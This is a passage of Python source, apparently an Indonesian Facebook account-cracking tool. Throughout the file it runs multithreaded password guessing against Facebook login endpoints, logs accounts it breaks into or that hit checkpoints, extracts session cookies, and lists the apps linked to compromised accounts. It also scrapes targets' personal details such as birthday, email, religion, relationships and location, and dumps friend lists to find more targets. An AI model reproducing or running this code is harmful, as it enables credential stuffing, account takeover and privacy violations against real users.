        dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
        jzst = form.find("input",{"name":"jazoest"})["value"]
        nh   = form.find("input",{"name":"nh"})["value"]
        dataD = {
            "fb_dtsg": dtsg,
            "fb_dtsg": dtsg,
            "jazoest": jzst,
            "jazoest": jzst,
            "checkpoint_data":"",
            "submit[Continue]":"Lanjutkan",
            "nh": nh
        }
        xnxx = par(ses.post(mb+form["action"], data=dataD).text, "html.parser")
        ngew = [yy.text for yy in xnxx.find_all("option")]
        opsi=[]
        option_dev = []
        for opt in range(len(ngew)):
            option_dev.append("\n     "+P+str(opt+1)+". "+ngew[opt]+" ")
        print(h_cp+"".join(option_dev))
    elif "login_error" in str(run):
        pass
    else:
        pass
def koki(cookies):
    result=[]
    for i in enumerate(cookies.keys()):
        if i[0]==len(cookies.keys())-1:result.append(i[1]+"="+cookies[i[1]])
        else:result.append(i[1]+"="+cookies[i[1]]+"; ")
    sample = "".join(result)
    sam_   = sample.replace(' ','')
    samp_  = sam_.split(';')
    final = ('%s; %s; %s; %s; %s'%(samp_[4],samp_[1],samp_[0],samp_[5],samp_[3]))
    return final
def cek_apk(h_ok,_dapunta_):
    apk = []
    ses_ = requests.Session()
    url = "https://mbasic.facebook.com/settings/apps/tabbed/?tab=active"
    dat_game = ses_.get(url,cookies={'cookie':_dapunta_})
    datagame = par(dat_game.content,'html.parser')
    form_    = datagame.find('form',method='post')
    for asu in form_.find_all("h3"):
        try:
            celeng = asu.find('span').text
            apk.append('\n   • '+celeng)
        except:pass
    url2 = "https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactive"
    dat_game = ses_.get(url2,cookies={'cookie':_dapunta_})
    datagame = par(dat_game.content,'html.parser')
    form_    = datagame.find('form',method='post')
    for asu in form_.find_all("h3"):
        try:
            celeng = asu.find('span').text
            apk.append('\n   • '+celeng)
        except:pass
    print(h_ok+''.join(apk))
def tahun(fx):
    if len(fx)==15:
        if fx[:10] in ['1000000000']       :tahunz = ' • 2009'
        elif fx[:9] in ['100000000']       :tahunz = ' • 2009'
        elif fx[:8] in ['10000000']        :tahunz = ' • 2009'
        elif fx[:7] in ['1000000','1000001','1000002','1000003','1000004','1000005']:tahunz = ' • 2009'
        elif fx[:7] in ['1000006','1000007','1000008','1000009']:tahunz = ' • 2010'
        elif fx[:6] in ['100001']          :tahunz = ' • 2010/2011'
        elif fx[:6] in ['100002','100003'] :tahunz = ' • 2011/2012'
        elif fx[:6] in ['100004']          :tahunz = ' • 2012/2013'
        elif fx[:6] in ['100005','100006'] :tahunz = ' • 2013/2014'
        elif fx[:6] in ['100007','100008'] :tahunz = ' • 2014/2015'
        elif fx[:6] in ['100009']          :tahunz = ' • 2015'
        elif fx[:5] in ['10001']           :tahunz = ' • 2015/2016'
        elif fx[:5] in ['10002']           :tahunz = ' • 2016/2017'
        elif fx[:5] in ['10003']           :tahunz = ' • 2018'
        elif fx[:5] in ['10004']           :tahunz = ' • 2019'
        elif fx[:5] in ['10005']           :tahunz = ' • 2020'
        elif fx[:5] in ['10006','10007','10008']:tahunz = ' • 2021'
        else:tahunz=''
    elif len(fx) in [9,10]:
        tahunz = ' • 2008/2009'
    elif len(fx)==8:
        tahunz = ' • 2007/2008'
    elif len(fx)==7:
        tahunz = ' • 2006/2007'
    else:tahunz=''
    return tahunz
class crack:
    def __init__(self,files):
        self.ada = []
        self.cp = []
        self.ko = 0
        print('%s║'%(O))
        print('%s╠══[%s•%s] %sCrack With Password Default/Manual [d/m]'%(O,P,O,P))
        while True:
            f = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
            if f=="":
                jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                menu()
            elif f in ['m','M','2','02','002']:
                try:
                    while True:
                        try:
                            self.apk = files
                            self.fs = open(self.apk).read().splitlines()
                            break
                        except Exception as e:
                            print ("   %s"%(e))
                            continue
                    self.fl = []
                    for i in self.fs:
                        try:
                            self.fl.append({"id":i.split("•")[0]})
                        except:continue
                except Exception as e:
                    print(("   %s"%e))
                    continue
                print('%s╠══[%s•%s] %sFor example : jeeck,786786,123456'%(O,P,O,P))
                self.pwlist()
                break
            elif f in ['d','D','1','01','001']:
                try:
                    while True:
                        try:
                            self.apk = files
                            self.fs = open(self.apk).read().splitlines()
                            break
                        except Exception as e:
                            print ("   %s"%(e))
                            continue
                    self.fl = []
                    start_methodezz()
                    kopi = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                    if kopi in ['']:
                        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                        menu()
                    elif kopi in ['1','01']:
                        for i in self.fs:
                            try:
                                self.fl.append({"id":i.split("•")[0],"pw":generate1(i.split("•")[1])})
                            except:continue
                    elif kopi in ['2','02']:
                        for i in self.fs:
                            try:
                                self.fl.append({"id":i.split("•")[0],"pw":generate2(i.split("•")[1])})
                            except:continue
                    elif kopi in ['3','03']:
                        for i in self.fs:
                            try:
                                self.fl.append({"id":i.split("•")[0],"pw":generate3(i.split("•")[1])})
                            except:continue
                    elif kopi in ['4','04']:
                        os.system('rm -rf pass.txt')
                        os.system('rm -rf passangka.txt')
                        tambah_pass()
                        tambah_pass_angka()
                        for i in self.fs:
                            try:
                                self.fl.append({"id":i.split("•")[0],"pw":generate4(i.split("•")[1])})
                            except:continue
                    else:
                        jalan('%s╚══[%s!%s] %Correct Content'%(M,P,M,P))
                        menu()
                    start_method()
                    put = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                    print('%s║'%(O))
                    if put in ['']:
                        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                        menu()
                    elif put in ['1','01','001','a']:
                        print('%s╠══[%s•%s] %sBring Up  CP Option? [y/t]'%(O,P,O,P))
                        puf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                        if puf in ['']:
                            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                            menu()
                        elif puf in ['1','01','001','y','Y']:
                            started()
                            ThreadPool(35).map(self.api_opsi,self.fl)
                            os.remove(self.apk)
                            exit()
                            break
                        elif puf in ['2','02','002','t','T']:
                            started()
                            ThreadPool(35).map(self.api,self.fl)
                            os.remove(self.apk)
                            exit()
                            break
                        else:
                            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                            menu()
                    elif put in ['2','02','002','b']:
                        print('%s╠══[%s•%s] %sBring Up  CP Option? [y/t]'%(O,P,O,P))
                        puf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                        if puf in ['']:
                            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                            menu()
                        elif puf in ['1','01','001','y','Y']:
                            started()
                            ThreadPool(35).map(self.mbasic_opsi,self.fl)
                            os.remove(self.apk)
                            exit()
                            break
                        elif puf in ['2','02','002','t','T']:
                            started()
                            ThreadPool(35).map(self.mbasic,self.fl)
                            os.remove(self.apk)
                            exit()
                            break
                        else:
                            jalan('%s╚══[%s!%s] %Correct Content'%(M,P,M,P))
                            menu()
                    elif put in ['3','03','003','c']:
                        print('%s╠══[%s•%s] %sBring up CP Option? [y/t]'%(O,P,O,P))
                        puf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                        if puf in ['']:
                            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                            menu()
                        elif puf in ['1','01','001','y','Y']:
                            started()
                            ThreadPool(35).map(self.free_opsi,self.fl)
                            os.remove(self.apk)
                            exit()
                            break
                        elif puf in ['2','02','002','t','T']:
                            started()
                            ThreadPool(35).map(self.free,self.fl)
                            os.remove(self.apk)
                            exit()
                            break
                        else:
                            jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                            menu()
                    else:
                        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
                        menu()
                except Exception as e:
                    print(("   %s"%e))
    def pwlist(self):
        self.pw = input('%s╠══[%s•%s] %sEnter Password : '%(O,P,O,P)).split(",")
        if len(self.pw) ==0:
            self.pwlist()
        else:
            for i in self.fl:
                i.update({"pw":self.pw})
            start_method()
            put = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
            print('%s║'%(O))
            if put in ['']:
                jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                menu()
            elif put in ['1','01','001','a']:
                print('%s╠══[%s•%s] %sBring up  CP Option? [y/t]'%(O,P,O,P))
                puf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                if puf in ['']:
                    jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                    menu()
                elif puf in ['1','01','001','y','Y']:
                    started()
                    ThreadPool(30).map(self.api_opsi,self.fl)
                    os.remove(self.apk)
                    exit()
                elif puf in ['2','02','002','t','T']:
                    started()
                    ThreadPool(30).map(self.api,self.fl)
                    os.remove(self.apk)
                    exit()
                else:
                    jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                    menu()
            elif put in ['2','02','002','b']:
                print('%s╠══[%s•%s] %sBring up CP option? [y/t]'%(O,P,O,P))
                puf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                if puf in ['']:
                    jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                    menu()
                elif puf in ['1','01','001','y','Y']:
                    started()
                    ThreadPool(30).map(self.mbasic_opsi,self.fl)
                    os.remove(self.apk)
                    exit()
                elif puf in ['2','02','002','t','T']:
                    started()
                    ThreadPool(30).map(self.mbasic,self.fl)
                    os.remove(self.apk)
                    exit()
                else:
                    jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                    menu()
            elif put in ['3','03','003','c']:
                print('%s╠══[%s•%s] %sBring up CP option? [y/t]'%(O,P,O,P))
                puf = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
                if puf in ['']:
                    jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                    menu()
                elif puf in ['1','01','001','y','Y']:
                    started()
                    ThreadPool(30).map(self.free_opsi,self.fl)
                    os.remove(self.apk)
                    exit()
                elif puf in ['2','02','002','t','T']:
                    started()
                    ThreadPool(30).map(self.free,self.fl)
                    os.remove(self.apk)
                    exit()
                else:
                    jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                    menu()
            else:
                jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
                menu()
    def api(self,fl):
        try:
            for i in fl.get("pw"):
                log = log_api(fl.get("id"),
                    i,"https://b-api.facebook.com")
                if log.get("status")=="cp":
                    try:
                        ke = requests.get("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + open("token.txt","r").read())
                        tt = json.loads(ke.text)
                        ttl = tt["birthday"]
                        m,d,y = ttl.split("/")
                        m = bulan_ttl[m]
                        print("\r%s[%sMARK-OK%s] %s • %s • %s %s %s%s"%(O,P,O,fl.get("id"),i,d,m,y,tahun(fl.get("id"))))
                        self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y))
                        open("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y))
                        break
                    except(KeyError, IOError):
                        m = " "
                        d = " "
                        y = " "
                    except:pass
                    print("\r%s[%sMARK-CP%s] %s • %s%s     "%(O,P,O,fl.get("id"),i,tahun(fl.get("id"))))
                    self.cp.append("%s•%s"%(fl.get("id"),i))
                    open("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                elif log.get("status")=="success":
                    print("\r%s[%sMARK-OK%s] %s • %s%s     "%(H,P,H,fl.get("id"),i,tahun(fl.get("id"))))
                    self.ada.append("%s•%s"%(fl.get("id"),i))
                    open("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                else:continue
                    
            self.ko+=1
            print("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(O,P,O,P,self.ko,len(self.fl),O,P,len(self.ada),O,P,len(self.cp),O,P), end=' ');sys.stdout.flush()
        except:
            self.api(fl)
    def api_opsi(self,fl):
        try:
            for i in fl.get("pw"):
                log = log_api(fl.get("id"),
                    i,"https://b-api.facebook.com")
                if log.get("status")=="cp":
                    try:
                        ke = requests.get("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + open("token.txt","r").read())
                        tt = json.loads(ke.text)
                        ttl = tt["birthday"]
                        m,d,y = ttl.split("/")
                        m = bulan_ttl[m]
                        print("\r%s[%sMARK-CP%s] %s • %s • %s %s %s%s"%(O,P,O,fl.get("id"),i,d,m,y,tahun(fl.get("id"))))
                        self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y))
                        open("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y))
                        break
                    except(KeyError, IOError):
                        m = " "
                        d = " "
                        y = " "
                    except:pass
                    print("\r%s[%sMARK-CP%s] %s • %s%s     "%(O,P,O,fl.get("id"),i,tahun(fl.get("id"))))
                    self.cp.append("%s•%s"%(fl.get("id"),i))
                    open("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                elif log.get("status")=="success":
                    print("\r%s[%sMARK-CP%s] %s • %s%s     "%(H,P,H,fl.get("id"),i,tahun(fl.get("id"))))
                    print("")
                    self.ada.append("%s•%s"%(fl.get("id"),i))
                    open("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                else:continue
                    
            self.ko+=1
            print("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(O,P,O,P,self.ko,len(self.fl),O,P,len(self.ada),O,P,len(self.cp),O,P), end=' ');sys.stdout.flush()
        except:
            self.api_opsi(fl)
    def mbasic(self,fl):
        try:
            for i in fl.get("pw"):
                log = log_mbasic(fl.get("id"),
                    i,"https://mbasic.facebook.com")
                if log.get("status")=="cp":
                    try:
                        ke = requests.get("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + open("token.txt","r").read())
                        tt = json.loads(ke.text)
                        ttl = tt["birthday"]
                        m,d,y = ttl.split("/")
                        m = bulan_ttl[m]
                        print("\r%s[%sMARK-CP%s] %s • %s • %s %s %s%s"%(O,P,O,fl.get("id"),i,d,m,y,tahun(fl.get("id"))))
                        self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y))
                        open("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y))
                        break
                    except(KeyError, IOError):
                        m = " "
                        d = " "
                        y = " "
                    except:pass
                    print("\r%s[%sMARK-CP%s] %s • %s%s     "%(O,P,O,fl.get("id"),i,tahun(fl.get("id"))))
                    self.cp.append("%s•%s"%(fl.get("id"),i))
                    open("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                elif log.get("status")=="success":
                    h_ok = "\r%s[%sMARK-OK%s] %s • %s%s%s     "%(H,P,H,fl.get("id"),i,tahun(fl.get("id")),P)
                    cek_apk(h_ok,koki(log.get("cookies")))
                    self.ada.append("%s•%s"%(fl.get("id"),i))
                    open("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                else:continue
                    
            self.ko+=1
            print("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(O,P,O,P,self.ko,len(self.fl),O,P,len(self.ada),O,P,len(self.cp),O,P), end=' ');sys.stdout.flush()
        except:
            self.mbasic(fl)
    def mbasic_opsi(self,fl):
        try:
            for i in fl.get("pw"):
                log = log_mbasic(fl.get("id"),
                    i,"https://mbasic.facebook.com")
                if log.get("status")=="cp":
                    try:
                        ke = requests.get("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + open("token.txt","r").read())
                        tt = json.loads(ke.text)
                        ttl = tt["birthday"]
                        m,d,y = ttl.split("/")
                        m = bulan_ttl[m]
                        h_cp = "\r%s[%sMARK-CP%s] %s • %s • %s %s %s%s"%(O,P,O,fl.get("id"),i,d,m,y,tahun(fl.get("id")))
                        cek_log(fl.get("id"),i,h_cp)
                        print("")
                        self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y))
                        open("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y))
                        break
                    except(KeyError, IOError):
                        m = " "
                        d = " "
                        y = " "
                    except:pass
                    h_cp = "\r%s[%sMARK-OK%s] %s • %s%s     "%(O,P,O,fl.get("id"),i,tahun(fl.get("id")))
                    cek_log(fl.get("id"),i,h_cp)
                    print("")
                    self.cp.append("%s•%s"%(fl.get("id"),i))
                    open("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                elif log.get("status")=="success":
                    h_ok = "\r%s[%sMARK-OK%s] %s • %s%s%s     "%(H,P,H,fl.get("id"),i,tahun(fl.get("id")),P)
                    cek_apk(h_ok,koki(log.get("cookies")))
                    print("")
                    self.ada.append("%s•%s"%(fl.get("id"),i))
                    open("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                else:continue
                    
            self.ko+=1
            print("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(O,P,O,P,self.ko,len(self.fl),O,P,len(self.ada),O,P,len(self.cp),O,P), end=' ');sys.stdout.flush()
        except:
            self.mbasic_opsi(fl)
    def free(self,fl):
        try:
            for i in fl.get("pw"):
                log = log_free(fl.get("id"),
                    i,"https://free.facebook.com")
                if log.get("status")=="cp":
                    try:
                        ke = requests.get("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + open("token.txt","r").read())
                        tt = json.loads(ke.text)
                        ttl = tt["birthday"]
                        m,d,y = ttl.split("/")
                        m = bulan_ttl[m]
                        print("\r%s[%sMARK-CP%s] %s • %s • %s %s %s%s"%(O,P,O,fl.get("id"),i,d,m,y,tahun(fl.get("id"))))
                        self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y))
                        open("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y))
                        break
                    except(KeyError, IOError):
                        m = " "
                        d = " "
                        y = " "
                    except:pass
                    print("\r%s[%sMARK-CP%s] %s • %s%s     "%(O,P,O,fl.get("id"),i,tahun(fl.get("id"))))
                    self.cp.append("%s•%s"%(fl.get("id"),i))
                    open("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                elif log.get("status")=="success":
                    h_ok = "\r%s[%sMARK-OK%s] %s • %s%s%s     "%(H,P,H,fl.get("id"),i,tahun(fl.get("id")),P)
                    cek_apk(h_ok,koki(log.get("cookies")))
                    self.ada.append("%s•%s"%(fl.get("id"),i))
                    open("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                else:continue
                    
            self.ko+=1
            print("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(O,P,O,P,self.ko,len(self.fl),O,P,len(self.ada),O,P,len(self.cp),O,P), end=' ');sys.stdout.flush()
        except:
            self.free(fl)
    def free_opsi(self,fl):
        try:
            for i in fl.get("pw"):
                log = log_free(fl.get("id"),
                    i,"https://free.facebook.com")
                if log.get("status")=="cp":
                    try:
                        ke = requests.get("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + open("token.txt","r").read())
                        tt = json.loads(ke.text)
                        ttl = tt["birthday"]
                        m,d,y = ttl.split("/")
                        m = bulan_ttl[m]
                        h_cp = "\r%s[%sMARK-CP%s] %s • %s • %s %s %s%s"%(O,P,O,fl.get("id"),i,d,m,y,tahun(fl.get("id")))
                        cek_log(fl.get("id"),i,h_cp)
                        print("")
                        self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y))
                        open("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y))
                        break
                    except(KeyError, IOError):
                        m = " "
                        d = " "
                        y = " "
                    except:pass
                    h_cp = "\r%s[%sMARK-OK%s] %s • %s%s     "%(O,P,O,fl.get("id"),i,tahun(fl.get("id")))
                    cek_log(fl.get("id"),i,h_cp)
                    print("")
                    self.cp.append("%s•%s"%(fl.get("id"),i))
                    open("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                elif log.get("status")=="success":
                    h_ok = "\r%s[%sMARK-CP%s] %s • %s%s%s     "%(H,P,H,fl.get("id"),i,tahun(fl.get("id")),P)
                    cek_apk(h_ok,koki(log.get("cookies")))
                    print("")
                    self.ada.append("%s•%s"%(fl.get("id"),i))
                    open("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                else:continue
                    
            self.ko+=1
            print("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(O,P,O,P,self.ko,len(self.fl),O,P,len(self.ada),O,P,len(self.cp),O,P), end=' ');sys.stdout.flush()
        except:
            self.free_opsi(fl)
def target():
    try:token = open('token.txt','r').read()
    except (KeyError,IOError):jalan('%s╚══[%s!%s] %sToken/Cookies Invalid'%(M,P,M,P));menu_log()
    idt = input("%s╠══[%s•%s] %sID Target : "%(O,P,O,P))
    try:
        zx = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token);zy = json.loads(zx.text)
    except (KeyError,IOError):jalan('%s╚══[%s!%s] %sID Not Found'%(M,P,M,P));menu()
    try:nm = zy["name"]
    except (KeyError,IOError):nm = ("-")
    try:nd = zy["first_name"]
    except (KeyError,IOError):nd = ("-")
    try:nt = zy["middle_name"]
    except (KeyError,IOError):nt = ("-")
    try:nb = zy["last_name"]
    except (KeyError,IOError):nb = ("-")
    try:ut = zy["birthday"]
    except (KeyError,IOError):ut = ("-")
    try:gd = zy["gender"]
    except (KeyError,IOError):gd = ("-")
    try:em = zy["email"]
    except (KeyError,IOError):em = ("-")
    try:lk = zy["link"]
    except (KeyError,IOError):lk = ("-")
    try:us = zy["username"]
    except (KeyError,IOError):us = ("-")
    try:rg = zy["religion"]
    except (KeyError,IOError):rg = ("-")
    try:rl = zy["relationship_status"]
    except (KeyError,IOError):rl = ("-")
    try:rls = zy["significant_other"]["name"]
    except (KeyError,IOError):rls = ("-")
    try:lc = zy["location"]["name"]
    except (KeyError,IOError):lc = ("-")
    try:ht = zy["hometown"]["name"]
    except (KeyError,IOError):ht = ("-")
    try:ab = zy["about"]
    except (KeyError,IOError):ab = ("-")
    try:lo = zy["locale"]
    except (KeyError,IOError):lo = ("-")
    jalan('%s╠══[%s•%s] %sName : %s'%(O,P,O,P,nm))
    jalan('%s╠══[%s•%s] %sFirst name : %s'%(O,P,O,P,nd))
    jalan('%s╠══[%s•%s] %sMiddle name : %s'%(O,P,O,P,nt))
    jalan('%s╠══[%s•%s] %sLast name : %s'%(O,P,O,P,nb))
    jalan('%s╠══[%s•%s] %sTTL : %s'%(O,P,O,P,ut))
    jalan('%s╠══[%s•%s] %sGender : %s'%(O,P,O,P,gd))
    jalan('%s╠══[%s•%s] %sEmail : %s'%(O,P,O,P,em))
    jalan('%s╠══[%s•%s] %sLink : %s'%(O,P,O,P,lk))
    jalan('%s╠══[%s•%s] %sUsername : %s'%(O,P,O,P,us))
    jalan('%s╠══[%s•%s] %sReligion : %s'%(O,P,O,P,rg))
    jalan('%s╠══[%s•%s] %sStatus Hubungan : %s'%(O,P,O,P,rl))
    jalan('%s╠══[%s•%s] %sRelationship With : %s'%(O,P,O,P,rls))
    jalan('%s╠══[%s•%s] %sResidence : %s'%(O,P,O,P,lc))
    jalan('%s╠══[%s•%s] %sPlace of Origin : %s'%(O,P,O,P,ht))
    jalan('%s╠══[%s•%s] %sAbout : %s'%(O,P,O,P,ab))
    jalan('%s╠══[%s•%s] %sLocale : %s'%(O,P,O,P,lo))
    print('%s║'%(O))
    input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
    menu()
def teman_target():
    it = input('%s╠══[%s•%s] %sID Target : '%(O,P,O,P))
    try:
        token = open('token.txt','r').read()
        mm = requests.get('https://graph.facebook.com/%s?access_token=%s'%(it,token))
        nn = json.loads(mm.text)
        print ('%s╠══[%s•%s] %sName : %s'%(O,P,O,P,nn['name']))
    except (KeyError,IOError):
        jalan('%s╚══[%s!%s] %sToken/Cookies Invalid'%(M,P,M,P))
        menu_log()
    tt=[]
    te=[]
    lim = input('%s╠══[%s•%s] %sLimit Dump : '%(O,P,O,P))
    print('%s║%s'%(O,P))
    ada = requests.get('https://graph.facebook.com/%s/friends?limit=%s&access_token=%s'%(it,lim,token))
    idi = json.loads(ada.text)
    for x in idi['data']:
        tt.append(x['id'])
    for id in tt:
        try:
            ada2 = requests.get('https://graph.facebook.com/%s/friends?access_token=%s'%(id,token))
            idi2 = json.loads(ada2.text)
            try:
                for b in idi2['data']:
                    te.append(b['id'])
            except KeyError:
                print('╠══[!] Private')
            print('╠══[•]',id,'•',len(te))
            te.clear()
        except KeyError:
            print('╠══[!] Spam Accounts')
    print('║')
    input('╚══[ Return ]')
    menu()
def hasil():
    clear()
    banner()
    jalan('%s╔══[ %sCrack Results %s]'%(O,P,O))
    print('%s║'%(O))
    print('%s╠══[%s1%s] %sCheck Result OK'%(O,P,O,P))
    print('%s╠══[%s2%s] %sCheck result CP'%(O,P,O,P))
    ch = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
    if ch in ['']:
        jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
        menu()
    elif ch in ['1','01','001','a']:
        try:
            okl = os.listdir("OK")
            print('%s║'%(O))
            print('%s╠══[%s Crack Results Stored in File OK%s]'%(O,P,O))
            print('%s║'%(O))
            for file in okl:
                print('%s╠══[%s•%s] %s%s'%(O,P,O,P,file))
            print('%s║'%(O))
            files = input('%s╚══[%s•%s] %sEnter File Name : '%(O,P,O,P))
            print('')
            if files == "":
                jalan('%s═══[%s!%s] %sCorrect Content'%(M,P,M,P))
                hasil()
            os.system('cat OK/%s'%(files))
            ppp = open("OK/%s"%(files)).read().splitlines()
            del1 = ("%s"%(files)).replace("-", " ").replace(".txt", "")
            print('\n%s╔══[%s•%s] %sTotal Crack Result Date %s is %s Account'%(O,P,O,P,del1,len(ppp)))
        except (KeyError,IOError):
            print('%s╠══[%s No Results Found %s]'%(M,P,M))
    elif ch in ['2','02','002','b']:
        try:
            cpl = os.listdir("CP")
            print('%s║'%(O))
            print('%s╠══[%s Crack Results Stored in CP Files %s]'%(O,P,O))
            print('%s║'%(O))
            for file in cpl:
                print('%s╠══[%s•%s] %s%s'%(O,P,O,P,file))
            print('%s║'%(O))
            files = input('%s╚══[%s•%s] %sEnter File Name : '%(O,P,O,P))
            print('')
            if files == "":
                jalan('%s═══[%s!%s] %sCorrect Content'%(M,P,M,P))
                hasil()
            os.system('cat CP/%s'%(files))
            ppp = open("CP/%s"%(files)).read().splitlines()
            del1 = ("%s"%(files)).replace("-", " ").replace(".txt", "")
            print('\n%s╔══[%s•%s] %sTotal Crack Result Date %s is %s Account'%(O,P,O,P,del1,len(ppp)))
        except (KeyError,IOError):
            print('%s╠══[%s No Results Found %s]'%(M,P,M))
    else:
        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
        menu()
    print('%s║'%(O))
    input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
    menu()
def log_hasil(user, pasw):
    ua = "Mozilla/5.0 (Linux; Android 11; vivo 1904 Build/RP1A.200720.012; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36"
    ses = requests.Session()
    ses.headers.update({
    "Host": "mbasic.facebook.com",
    "cache-control": "max-age=0",
    "upgrade-insecure-requests": "1",
    "origin": host,
    "content-type": "application/x-www-form-urlencoded",
    "user-agent": ua,
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "x-requested-with": "mark.via.gp",
    "sec-fetch-site": "same-origin",
    "sec-fetch-mode": "navigate",
    "sec-fetch-user": "?1",
    "sec-fetch-dest": "document",
    "referer": host+"/login/?next&ref=dbl&fl&refid=8",
    "accept-encoding": "gzip, deflate",
    "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"
    })
    data = {}
    ged = par(ses.get(host+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
    fm = ged.find("form",{"method":"post"})
    list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
    for i in fm.find_all("input"):
        if i.get("name") in list:
            data.update({i.get("name"):i.get("value")})
        else:
            continue
    data.update({"email":user,"pass":pasw})
    try:
        run = par(ses.post(host+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
    except requests.exceptions.TooManyRedirects:
        print("%s[%s!%s] %sSpam Accounts"%(M,P,M,P))
    if "c_user" in ses.cookies:
        print("%s[%s•%s] %sAccount OK No Checkpointt"%(H,P,H,P))
    elif "checkpoint" in ses.cookies:
        form = run.find("form")
        dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
        jzst = form.find("input",{"name":"jazoest"})["value"]
        nh   = form.find("input",{"name":"nh"})["value"]
        dataD = {
            "fb_dtsg": dtsg,
            "fb_dtsg": dtsg,
            "jazoest": jzst,
            "jazoest": jzst,
            "checkpoint_data":"",
            "submit[Continue]":"Lanjutkan",
            "nh": nh
        }
        xnxx = par(ses.post(host+form["action"], data=dataD).text, "html.parser")
